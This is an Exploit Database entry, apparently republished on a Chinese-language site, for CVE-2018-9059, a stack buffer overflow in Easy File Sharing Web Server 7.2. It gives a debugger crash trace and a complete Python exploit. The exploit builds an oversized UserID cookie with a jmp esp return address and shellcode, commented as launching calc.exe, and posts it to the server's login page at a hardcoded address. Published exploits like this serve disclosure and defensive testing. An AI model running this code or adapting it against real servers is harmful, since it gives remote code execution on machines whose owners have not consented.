Easy File Sharing Web Server 7.2 – Stack Buffer Overflow

• Exploit Database
• 13 阅读

• 作者： rebeyond
  日期： 2018-04-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44485/

• # Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
  # Date: 03/24/2018
  # Exploit Author: rebeyond - http://www.rebeyond.net
  # Vendor Homepage: http://www.sharing-file.com/
  # Software Link: http://www.sharing-file.com/efssetup.exe
  # Version: 7.2
  # CVE: CVE-2018-9059
  # Tested on: Windows XP Professional SP3
  #
  # Description:
  # Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
  #
  #
  # The stack trace is as follows:
  # (40d8.2980): Access violation - code c0000005 (first chance)
  # r
  # eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
  # eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
  # cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
  # *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
  # sqlite3!sqlite3_errcode+0x8e:
  # 61c277f6 81784c97a629a0cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
  #
  # kb
  # ChildEBP RetAddrArgs to Child
  # WARNING: Stack unwind information not available. Following frames may be wrong.
  # 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
  # *** WARNING: Unable to verify checksum for fsws.exe
  # *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
  # 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
  # 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
  # 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
  
  
  import requests
  host='192.168.50.30'
  port='80'
  
  buf='A'*4071
  buf +='\x12\x45\xfa\x7f' #jmp esp
  buf +='A'*12
  buf +='\xeb\x36'#jmp 0x36
  buf +='A'*42
  buf +='\x60\x30\xc7\x61'*2 #must be valid address
  buf +='A'*4
  #shellcode to execute calc.exe on remote server
  buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
  buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
  buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
  buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
  buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
  buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
  buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
  buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
  buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
  buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
  buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
  buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
  buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
  buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
  buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
  buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
  buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
  
  cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
  data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
  requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)